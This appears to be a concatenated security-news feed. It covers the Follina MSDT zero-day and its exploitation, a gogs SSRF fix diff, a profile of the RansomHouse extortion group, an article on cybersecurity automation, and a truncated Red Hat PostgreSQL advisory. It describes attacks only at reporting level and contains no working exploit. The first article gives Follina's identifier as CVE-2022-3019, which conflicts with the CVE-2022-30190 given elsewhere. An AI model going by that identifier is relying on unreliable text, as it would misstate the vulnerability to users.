Threat actors already are exploiting vulnerability, dubbed ‘Follina’ and originally identified back in April, to target organizations in Russia and Tibet, researchers said.

Threat actors already are exploiting vulnerability, dubbed ‘Follina’ and originally identified back in April, to target organizations in Russia and Tibet, researchers said.

Microsoft has released a workaround for a zero-day flaw that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.

The remote control execution (RCE) flaw, tracked as CVE-2022-3019, is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company’s products and reports to Microsoft Support.

If successfully exploited, attackers can install programs, view, change or delete data, or create new accounts in the context allowed by the user’s rights, the company said.

“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” Microsoft explained in its guidance on the Microsoft Security Response Center. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.”

Microsoft’s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from Shadow Chaser Group noticed it on April 12 in a bachelor’s thesis from August 2020—with attackers apparently targeting Russian users–and reported to Microsoft on April 21, according to research firm Recorded Future’s The Record.

A Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said in a post on Twitter over the weekend, retweeting the original post about the vulnerability, also made on April 12, from @h2jazi.

When the flaw was reported, Microsoft didn’t consider it an issue. It’s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at  Japanese security vendor Nao Sec, who tweeted a fresh warning about it over the weekend, noting that it was being used to target users in Belarus.

In analysis over the weekend noted security researcher Kevin Beaumont dubbed the vulnerability “Follina,” explaining the zero-day code references the Italy-based area code of Follina – 0438.

****Current Workaround****

While no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This “prevents troubleshooters being launched as links including links throughout the operating system,” the company wrote in their advisory.

To do this, users must follow these steps: Run “:**Command Prompt** **as Administrator****“**; Back up the registry key by executing the command “reg export HKEY\_CLASSES\_ROOT\\ms-msdt _filename_“; and execute the command “reg delete HKEY\_CLASSES\_ROOT\\ms-msdt /f”.

“Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters,” the company said.

Moreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, “both of which prevent the current attack,” Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.

Microsoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.

****Significant Risk****

In the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.

One is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.

“Every organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,” Aviv Grafi, CTO and founder of security firm Votiro, wrote in an e-mail to Threatpost.

Another reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.

Since the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.

“What makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a ‘zero-click’ remote code execution technique used through MSDT,” Grafi concurred.

****Under Active Attack****

Claire Tills, senior research engineer for security firm Tenable, compared the flaw to last year’s zero-click MSHTML bug**,** tracked as CVE-2021-40444, which was pummeled by attackers, including the Ryuk ransomware gang.

“Given the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,” she wrote in an e-mail to Threatpost.

Indeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also tweeted that threat actors were using the flaw to target organizations in Tibet by impersonating the “Women Empowerments Desk” of the Central Tibetan Administration.

What’s more, the workaround that Microsoft currently offers itself has issues and won’t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is”not friendly for admins” because it involves “changes in the Registry of the end user’s endpoints.”

Microsoft Releases Workaround for ‘One-Click’ 0Day Under Active Attack

Server-Side Request Forgery (SSRF) in GitHub repository gogs/gogs prior to 0.12.8.

@@ -119,20 +119,17 @@ func WebhooksNew(c \*context.Context, orCtx \*orgRepoContext) { c.Success(orCtx.TmplNew) }  
func validateWebhook(actor \*db.User, l macaron.Locale, w \*db.Webhook) (field, msg string, ok bool) { if !actor.IsAdmin { // 🚨 SECURITY: Local addresses must not be allowed by non-admins to prevent SSRF, // see https://github.com/gogs/gogs/issues/5366 for details. payloadURL, err := url.Parse(w.URL) if err != nil { return "PayloadURL", l.Tr("repo.settings.webhook.err\_cannot\_parse\_payload\_url", err), false }  
if netutil.IsLocalHostname(payloadURL.Hostname(), conf.Security.LocalNetworkAllowlist) { return "PayloadURL", l.Tr("repo.settings.webhook.err\_cannot\_use\_local\_addresses"), false } func validateWebhook(l macaron.Locale, w \*db.Webhook) (field, msg string, ok bool) { // 🚨 SECURITY: Local addresses must not be allowed by non-admins to prevent SSRF, // see https://github.com/gogs/gogs/issues/5366 for details. payloadURL, err := url.Parse(w.URL) if err != nil { return "PayloadURL", l.Tr("repo.settings.webhook.err\_cannot\_parse\_payload\_url", err), false }  
if netutil.IsBlockedLocalHostname(payloadURL.Hostname(), conf.Security.LocalNetworkAllowlist) { return "PayloadURL", l.Tr("repo.settings.webhook.url\_resolved\_to\_blocked\_local\_address"), false } return "", "", true }  
@@ -144,7 +141,7 @@ func validateAndCreateWebhook(c \*context.Context, orCtx \*orgRepoContext, w \*db.W return }  
field, msg, ok := validateWebhook(c.User, c.Locale, w) field, msg, ok := validateWebhook(c.Locale, w) if !ok { c.FormErr(field) c.RenderWithErr(msg, orCtx.TmplNew, nil) @@ -348,7 +345,7 @@ func validateAndUpdateWebhook(c \*context.Context, orCtx \*orgRepoContext, w \*db.W return }  
field, msg, ok := validateWebhook(c.User, c.Locale, w) field, msg, ok := validateWebhook(c.Locale, w) if !ok { c.FormErr(field) c.RenderWithErr(msg, orCtx.TmplNew, nil)

CVE-2022-1285: webhook: revalidate local hostname before each delivery (#6988) · gogs/gogs@7885f45

An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems.
"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in

An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems.

"TA413 CN APT spotted \[in-the-wild\] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet.

"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web\[.\]app."

TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox.

The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code.

Specifically, the attack makes it possible for threat actors to circumvent Protected View safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the Preview Pane in Windows File Explorer.

While the bug gained widespread attention last week, evidence points to the active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.

The company, however, did not deem it a security issue and closed the vulnerability submission report, citing reasons that the MSDT utility required a passkey provided by a support technician before it can execute payloads.

The vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.

"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros," Malwarebytes' Jerome Segura noted.

Although there is no official patch available at this point, Microsoft has recommended disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been advised to turn off the Preview Pane in File Explorer.

"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely," Nikolas Cemerikic of Immersive Labs said.

"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability

RansomHouse, a new extortion group, distances itself from ransomware. However, it seems like it had ties to ransomware groups in the past.
The post Threat profile: RansomHouse makes extortion work without ransomware appeared first on Malwarebytes Labs.

Cybersecurity is an industry known for many hats: white hats, black hats, and grey hats. White hats refer to “the good people” in the industry for those who are not in the know. They are malware analysts, security researchers, and penetration testers. Black hats are the opposite of white hats, and we collectively refer to them as cybercriminals.

The existence of a third hat is intriguing but not surprising. It denotes black hats have the potential to be and do good. On the other hand, white hats can put one foot on the dark side while leaving a reassuring foot in the light.

Security researchers have speculated that a new extortion group called RansomHouse is a collection of “frustrated” white hats who have collectively been pushed to the point of punishing organizations that continue to have lax security in their infrastructure.

**RansomHouse 101**

RansomHouse is a new extortion group that gets into victims’ networks by exploiting vulnerabilities to steal data and coerces victims to pay up, lest their data is sold to the highest bidder. And if no criminal is interested in buying the data, the group leaks it on their leak site.

This group is also unique in the way it extorts money from victims. They appear to market themselves as penetration testers and bug bounty hunters more than your average online extortionist. After stealing data from targets, they offer to delete it and then provide a full report on what vulnerabilities they exploited and how.

Like ransomware groups, they also have channels in place—a Telegram account and a leak site—to communicate with victims, journalists, and those who want to track their activities.

RansomHouse’s main page and leak page where the group lists its victims. (Source: Marcelo Rivero | Malwarebytes)

RansomHouse is believed to have emerged in December 2021 and currently has four victims, the first of which was Canada’s Saskatchewan Liquor and Gaming Authority (SLGA), a regulator of alcohol, cannabis, and most gambling in the province, which first reported a breach in that same month and year.

According to the “About” page on RansomHouse’s Onion site, they call themselves “a professional mediators community.”

Below are reprints of sections from that page:

    We have nothing to do with any breaches and don't produce or use any ransomware. Our primary goal is to minimize the damage that might be sustained by related parties.
    
    We believe that the culprits are not the ones who found the vulnerability or carried out the hack, but those who did not take proper care of security. The culprits are those who did not put a lock on the door leaving it wide open inviting everyone in.
    
    But evolution cannot be stopped, fitting structures emerge in every environment, and so groups of enthusiasts have emerged on the grounds of data negligence, eager to get paid honestly by streamlining this chaos through public punishment. These methods of making money and pointing out companies' mistakes may be controversial, and when you recall that we are talking about billion-dollar corporations on the opposing side, it becomes clear why the RansomHouse team is so important to engage in dialogue. That is what this project is all about - bringing conflicting parties together, helping them to set up a dialogue and make informed, balanced decisions. The team works hard to find a way out of even the most difficult situations and allow both parties to go forward without changing rules as they go along. Incompetence and fuss is unacceptable when dealing with such cases, which is exactly what happens most often. Here and now we are creating a new culture and streamlining this industry.

The “About” page, which reads more like a manifesto, is telling. First, it openly declares that organizations, not the cybercriminals after their data, are the real “culprits” for certain types of cyberattacks. Second, the bug hunters who find flaws in systems or networks owned by organizations, which may not have a bounty program in place, must be recognized for the time and effort to find these flaws and be compensated appropriately.

Cyberint’s Shmuel Gihon indicated that RansomHouse is “practically forcing ‘penetration testing service’ on organizations that never used their services or rewarded bug bounties.”

Lastly, the group puts itself at the center as an entity that’ll make things right, calling this entire endeavor a “project” instead of what it really is: an extortion scheme with the facade of a good samaritan. The group’s actions benefit no one but them and their associates, embolden others to act out their frustration, and—if they are indeed white hats in a midlife crisis—slowly erode the foundations of trust and integrity the cybersecurity industry stands on.

**Links with ransomware groups**

RansomHouse has been firm about its non-use of ransomware in its exploits despite the group’s name. They also reportedly do not encrypt files they stole from organizations. However, it is worth noting that the group has a history of collaborating with ransomware gangs, such as White Rabbit.

BleepingComputer pointed out the group was mentioned in one of White Rabbit’s ransom notes.

One can also see RansomHouse’s possible link to the Hive ransomware group.

Hagar Margolin, cyberanalyst for Webz.io, a company providing machine-defined web data, pointed out the uncanny similarities of Hive’s leak site post to that of RansomHouse’s.

A side-by-side comparison of Hive ransomware’s victim post versus a victim post from RansomHouse’s Tor site. (Source: Webz.io)

**Are they really disgruntled bug bounty hunters?**

Bug hunting could be a way of living. Much like many of the jobs within the cybersecurity industry, it’s not as glamorous as some people make it.

Of course, getting rich hunting for inherent flaws would depend on the severity of the bug found and the availability of a bounty program in an organization. Bug hunting wouldn’t be as lucrative if one or both of these aren’t fully satisfied.

Gihon assessed that RansomHouse “might have a blue and red team background and might even be disgruntled bug bounty hunters looking to be taken more seriously by organizations.” In cybersecurity, a “blue team” plays the role of Defender in a cyberattack. In contrast, a “red team” plays the role of Adversary.

What led Cyberint to this theory is RansomHouse’s overall professional demeanor when communicating with others. They were seen as polite and focused, not easily swayed away into irrelevant conversations. The group also claimed they’re “pro-freedom,” “very liberal,” and won’t have anything to do with radical hacktivists or espionage groups.

Cyberint also touched on a known problem within the bug bounty community that is currently brewing.

“Many of the bug bounty hunter community members have been complaining for some time now about companies that do not want to pay the bounty for their hard labour while still enjoying its fruits,” Gihon said. “Bug bounty programs also increase their commissions making the bug bounty hunter a very frustrating profession.”

The struggles with bug hunting may be real, but according to one expert, even calling RansomHouse a group of bug hunters could be inaccurate.

In an interview with BleepingComputer, Emsisoft Threat Analyst Brett Callow said that actors behind the White Rabbit ransomware may be behind RansomHouse:

> “The RansomHouse platform is supposedly used by ‘club members’ who carry out attacks using their own tools—and, according to them, those tools include ransomware such as White Rabbit. I suspect, however, that their claims are untrue and that the same individuals who carry out the attacks are also behind RansomHouse.”

Regardless of the group’s origins, one thing is clear: they are going after organizations that they have decided are not doing enough to secure their clients’ data. They pose a threat similar to ransomware groups. This should be enough reason for organizations of any size to work with their IT teams in strengthening the business’s overall security posture.

Threat profile: RansomHouse makes extortion work without ransomware

"Follina" vulnerability in Microsoft Support Diagnostic Tool (MSDT) affects all currently supported Windows versions and can be triggered via specially crafted Office documents.

Attackers are actively exploiting an unpatched and easy-to-exploit flaw in the Microsoft Support Diagnostic Tool (MSDT) in Windows that allows for remote code execution from Office documents even when macros are disabled.

The vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus, according to security researchers that have analyzed the issue.

Attackers can exploit the zero-day flaw — dubbed "Follina" — to remotely execute arbitrary code on Windows systems. Microsoft has warned of the issue giving attackers a way to "install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights." Researchers have reported observing attacks exploiting the flaw in India and Russia going back at least one month.

**Delayed Acknowledgement?**

Microsoft on Monday assigned the flaw a CVE identifier — CVE-2022-30190 — after apparently initially describing it as a non-security issue in April when crazyman, a security researcher with APT threat hunting group Shadow Chaser Group, first reported observing a public exploit of the vulnerability. Though the company's advisory described the flaw as being publicly known and actively exploited, it did not describe the issue as a zero-day threat.

In a May 30 blog post, Microsoft recommended that organizations disable the MSDT URL protocol to mitigate the issue and said it would provide more updates later without specifying when. Microsoft said the Protected View feature in Microsoft Office and the Application Guard for Office both would prevent attacks that try to exploit the flaw.

Microsoft did not respond to a Dark Reading query on whether it had initially described the issue as a non-security issue or when it might have first learned of the flaw. Instead, a spokeswoman pointed to Microsoft's Monday advisory as the only comment the company has on the issue at this time.

MSDT is a Windows support tool that collects and sends data from a user's system to Microsoft support staff so they can analyze and diagnose issues that a user might be encountering on their system. According to Microsoft, the vulnerability is triggered when an Office app like Word calls MSDT using the URL protocol. "An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application," the company noted.

**Multiple Exploits in the Wild**

Though the security researcher with the Shadow Chaser Group first notified Microsoft Security Response Center about the bug more than a month ago, the vuln only received broad attention over the weekend when a researcher spotted a malicious Word document attempting to exploit the issue. Security researcher Kevin Beaumont analyzed the document and found that it was using the remote template feature in Word to retrieve a HTML file from a remote Web server. The retrieved file in turn used the MS-MSDT URL protocol to load code for executing a PowerShell script. Beaumont discovered the document was executing code even with macros disabled. The security researcher found at least two other malicious Word documents in the wild attempting to exploit Follina going back to April.

Significantly, Beaumont and other researchers found that the attack technique allowed threat actors a way to bypass the "Protected View" mechanism in Office that alerts users about content downloaded from the Internet and requires an additional click from them to open. According to Malwarebytes, the warning can be bypassed simply by changing the document to a Rich Text Format (RTF) file. By doing so, code can run without the user even needed to open the document via the preview tab in Explorer, Malwarebytes said.

"RTF files are a special format that allows for documents to be previewed inside of Windows Explorer," says Jerome Segura, senior director of threat intelligence at Malwarebytes. "When that happens, Explorer will call out the msdt process which is being exploited without any warning or prompts," he says. In fact, the Preview pane is a risky feature because it enables zero-click attacks, Segura says. "We recommend users to disable it within Explorer as well as email clients like Outlook."

**Potentially Widespread Impact**

Johannes Ullrich, dean of research at the SANS Institute, says by itself the vulnerability in MSDT wouldn’t be a big deal. But the fact that it can be triggered via Microsoft Office is troubling. All that a user needs to do is to open a specially crafted Word document, or in some cases just previewing it to enable remote code execution, he says. This sets the stage for potentially widespread compromises especially considering that numerous exploits have been available in the wild for a month now.

"There are multiple scripts, examples and tutorials explaining how to exploit this vulnerability. Applying these techniques is easy, Ullrich says. He points to one malicious document to exploit Follina that SANS discovered recently, which purported to contain quotes for mobile phone prices from a reseller. The exploit worked though it appears to have been compiled by a relatively unskilled threat actor. "It appears to have been created by a novice attacker as it doesn't even remove some of the comments added to the malicious document," Ullrich says.  

He recommends that organizations immediately follow Microsoft's guidance and disable the MSDT URL protocol. "This will break the link between Office and the diagnostic tool," he says. Though the vulnerability in MSDT will still be present, it can no longer be triggered when opening a malicious document, he says. SANS recommends that organizations disable the Preview Pane in Windows Explorer.

Dray Agha, ThreatOps analyst at Huntress, which did a deep dive on the vulnerability, says attackers can use Follina to escalate privileges and travel across environments to create havoc. "Hackers can go from being a low-privilege user to an admin extremely easily," Agha says. "The vulnerability can be easily triggered by users simply choosing to “preview” a specifically crafted, maliciously supplied document. It’s that simple."

New Microsoft Zero-Day Attack Underway

By Owais Sultan
Businesses of all sizes are prone to cyberattacks, and this is no longer a taboo. Malicious actors are…
This is a post from HackRead.com Read the original post: Cybersecurity Automation: How Can Businesses Benefit From It

Businesses of all sizes are prone to cyberattacks, and this is no longer a taboo. Malicious actors are becoming intelligent, and tools are evolving, so what could prevent data breaches or other cybercrimes?

The truth is that it can be pretty hard to fight against cybercriminals, but it’s not impossible. Technology is on your side, and all you need is to reconsider your choices in terms of security.

Traditional methods can be a bit too old in today’s data-driven world, but there are ways to secure your precious corporate data, and automation is one of them. We would say that the best way to combat cyber threats is by making use of the same technology that drives them.

Not to mention that it’s indispensable for businesses to secure their systems given the incommensurable number of data they’re dealing with. Manual labor may be effective, but it couldn’t keep up with the amount of data and operations that need to be secured.

And if we are to mention the costs associated with cyberattacks, you should take measures now; as IBM reports, the cost of a data breach has reached $4.24 million, the highest cost such crimes have known in the last years. Such an enormous cost could break your bank and endanger your business, leading to bankruptcy.

Have a look at this article to find out how automation works and the various benefits of implementing an automated cybersecurity protocol.

**What is cybersecurity automation?**

Before explaining cybersecurity automation, we need to clarify what each concept means. Thus, automation refers to those technologies used to minimize the human labor within an organization (and not only) and increase productivity.

Sectors like the manufacturing industry are already leveraging automation, going the “robots” ways: robotic process automation (RPA) implies machine automation, which means robots working on production lines to minimize human error and boost efficiency.

Cybersecurity refers to the practices that help your enterprise stay away from cyber threats, protecting anything from your customers’ sensitive information to your computer systems. Cybersecurity is not only about responding to actual threats but also about preventing attacks before they happen, which should be one of your main goals.

Cybersecurity automation is the concept used to describe advanced systems based on artificial intelligence (AI) and machine learning (ML). These features help businesses deal with cyber threats and defuse them before affecting crucial operations. Cybersecurity automation fights even against highly developed technologies like deepfake that hackers use to compromise a system.

**Benefits of automating cybersecurity**

If you’re still in doubt, find below some of the most significant advantages of cybersecurity automation alongside some of the functions that organizations can automate to protect their data.

**Generate defenses faster than attacks can spread**

Protecting your businesses from cyber threats is, more often than not, a daunting task that is unlikely to have an end. And with today’s types of cybercrimes, it becomes harder and harder to keep pace with an attack unless you use advanced technology.

Cybersecurity automated systems can stop newly discovered threats and successfully eliminate them so that your endpoints, cloud, or company’s network will be safe from getting infected.

It’s all in vain to manually develop a set of defenses for the various enforcement points to respond to future behaviors; this will only slow you down and increase the risk of error. Besides, it’s challenging to correlate the many security vendors in your environment, so it would be best to choose to cyber secure your systems.

**Reduce redundancy**

One of the most significant benefits of cybersecurity automation is that it reduces redundancy. Some jobs like accounting and client billing, for example, involve repetitive tasks that are often time-consuming. But you no longer have to deal with these issues: use Timesheet Portal software to make expense keeping, accounting, and billing smoother.

IT professionals are also facing redundancy at work, spending a significant amount of their time on repetitive tasks. Businesses should, without any doubt, take measures in this regard, and automating their systems is one of the best practices. This way, they increase employee productivity and system security because, to be honest, cyberattacks are less likely to happen if you install advanced AI tools.

**Improve accuracy**

It’s nothing new under the sun that automation minimizes human error. Robots may have a bad reputation in movies like Transformers, but their real-life impact on compliances and processes is indisputable. The lack of automation in some businesses can lead to severe mistakes and expose the company to data breaches.

That’s why we strongly recommend going the digital route and choosing automated software to keep all your corporate data in a safe place, control access to them, and ensure consistency in performance.

**Correlate data**

Security vendors usually gather significant amounts of threat information but don’t really organize it into actionable steps. In order to do that, enterprises first have to gather dangerous information over attack vectors and from protective technologies, all that by making use of their own infrastructure. This can be not easy if we are to mention that they can’t gather such a tremendous amount of data.

To prevent attacks, you need to collect data from different groups of threats, but you’re unlikely to have enough computing power to measure and analyze the unimaginable threat volume of today’s data-driven world. Thus, consider adopting measures based on cybersecurity automation to make sure no malicious actor could ever compromise your system.

**Simulate attacks**

One of the best ways to fight against an attack is to simulate it. We know it sounds like a fantasy, but technological advancements nowadays allow for this, and business owners out there can only be grateful. These tests can detect potential threats and fight against current ones without putting your system at risk. Automated simulations recreate malicious behavior to discover security gaps in your system and develop protections against future threats.

**Takeaway**

Cybersecurity automation has gained ground, and many business owners using advanced AI and ML to stop cybercrimes in their workplace. With the rise of data breaches and malware, it has become mandatory for businesses to keep their corporate data away from the curious eyes of hackers.

Cybersecurity Automation: How Can Businesses Benefit From It

Red Hat Security Advisory 2022-4807-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:12 security update  
Advisory ID:       RHSA-2022:4807-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4807  
Issue date:        2022-05-31  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (12.11).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.src.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.11-2.module+el8.6.0+15345+1dd8d6b8.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
